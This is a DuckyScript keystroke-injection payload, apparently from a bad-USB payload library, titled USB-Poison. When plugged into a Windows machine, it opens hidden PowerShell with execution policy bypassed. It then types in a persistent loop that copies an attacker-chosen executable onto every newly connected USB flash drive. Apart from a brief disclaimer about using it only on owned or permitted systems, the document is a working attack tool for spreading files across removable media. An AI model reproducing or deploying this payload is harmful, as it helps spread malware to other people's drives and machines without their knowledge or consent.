Path: blob/master/payloads/library/general/USB-Poison/USB-Poison.txt
2968 views
REM Author: beigeworm1REM Title: USB-Poison2REM Target: Windows 10/113REM Description: This script waits for new USB flash storage devices to be connected.4REM Description: When a new device connects, this script will copy a desired file to the root of newly connected drive.56REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**78REM Define the local path to your file to copy.9DEFINE #FILEPATH path/to/your/file.exe1011REM Funtion to detect Windows is ready for keystrokes12EXTENSION PASSIVE_WINDOWS_DETECT13REM VERSION 1.114REM AUTHOR: Korben1516REM CONFIGURATION:17DEFINE #MAX_WAIT 15018DEFINE #CHECK_INTERVAL 2019DEFINE #WINDOWS_HOST_REQUEST_COUNT 220DEFINE #NOT_WINDOWS 72122$_OS = #NOT_WINDOWS2324VAR $MAX_TRIES = #MAX_WAIT25WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))26DELAY #CHECK_INTERVAL27$MAX_TRIES = ($MAX_TRIES - 1)28END_WHILE29IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN30$_OS = WINDOWS31END_IF3233END_EXTENSION34IF $_OS != WINDOWS35LED_R36STOP_PAYLOAD37END_IF3839REM Main bad-USB script40LED_G41GUI r42DELAY 50043STRINGLN powershell -Ep Bypass -W H44DELAY 300045STRINGLN $file="#FILEPATH";while($true){$initialDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;while($true){$currentDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;$newDrive=$currentDrives | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID};if($newDrive){$drive=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | Where-Object {$initialDrives.DeviceID -notcontains $_.DeviceID};$driveletter=($drive.DeviceID + '/');Copy-Item -Path $file -Destination $driveletter;sleep 1;break}sleep 1}}464748